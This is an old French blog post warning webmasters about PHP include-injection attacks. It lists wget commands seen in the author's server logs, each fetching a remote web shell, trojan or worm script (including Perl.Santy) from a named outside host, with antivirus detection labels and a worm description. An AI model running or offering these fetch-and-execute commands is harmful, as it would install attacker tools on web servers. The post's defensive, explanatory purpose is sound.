Aller au contenu | Aller au menu | Aller à la recherche


Hack php par injection

Par PlaceOweb le mercredi, juillet 5 2006, 03:00 - PHP - Lien permanent

Si vous avez oubliez de vérifier le contenu de vos include php, faites attention car certains scripts malveillants permettent d'intruser votre système. Ainsi n'importe quel internaute peut administrer votre serveur web avec les droits de l'utilisateur de votre serveur web (apache ou autre).

Voici une liste récente des attaques web à destination de ce serveur web et le détail de ces scripts malveillants ! Qui sont soit des virus à destinations des ordinateurs des internautes, soit des injections pour pénétrer et prendre la main sur les serveurs web dans le but d'en faire par exemple un espace de stockage... et dans le pire des cas de films pédophiles ou d'œuvres sans que vous ayez les droits de diffusion... vous imaginez les dégâts d'étique et administratif ?

Ci dessous une liste (datant de 2006) de sites possédant des Hack Script PHP, permettant au hacker d'avoir une console sur votre serveur, si vous avez une faille d'include.

wget --output-document=tool25.png "http://hcaku.iespana.es/tool25.png?&cmd=id"
Hacktool


wget --output-document=therules25.png "http://hcaku.iespana.es/therules25.png"
Trojan horse is a generic detection for various Trojan horse programs.


wget --output-document=cmd.txt "http://otravesso.100free.com/cmd.txt?&cmd=id"
Hacktool (IHM)


wget --output-document=talikasih.txt "http://www.geocities.com/sakitcrew_dalnet/talikasih.txt"
Hacktool (Upload file)


wget --output-document=cse.gif "http://www.lfxmsc.gov.cn/cse.gif?&cmd=id"
... 


wget --output-document=energie.txt "http://dooku.anonimoserver.com/~web/energie.txt"
Perl.Santy

Discovered on: December 21, 2004
Last Updated on: January 16, 2005 11:39:21 PM

Perl.Santy is a worm written in Perl script that attempts to spread to Web servers running versions of the phpBB 2.x bulletin board software prior to 2.0.11, which are vulnerable to the PHPBB Viewtopic.PHP PHP Script Injection Vulnerability. Other systems are not affected. If successful, the worm copies itself to the server and overwrites the files with the following extensions:

   * .asp
   * .htm
   * .jsp
   * .php
   * .phtm
   * .shtm

The worm uses the Google search engine to find potential new infection targets. Google has now implemented blocking Perl.Santy search requests, which is expected to greatly reduce the worm's ability to propagate and lower the risk of further infections.

Un site français http://10function.kicks-ass.org/, parlant de hacking et répertoriant protocoles, script et outils d'analyse, de scan, etc...

Ajouter un commentaire

Le code HTML est affiché comme du texte et les adresses web sont automatiquement transformées.

Fil des commentaires de ce billet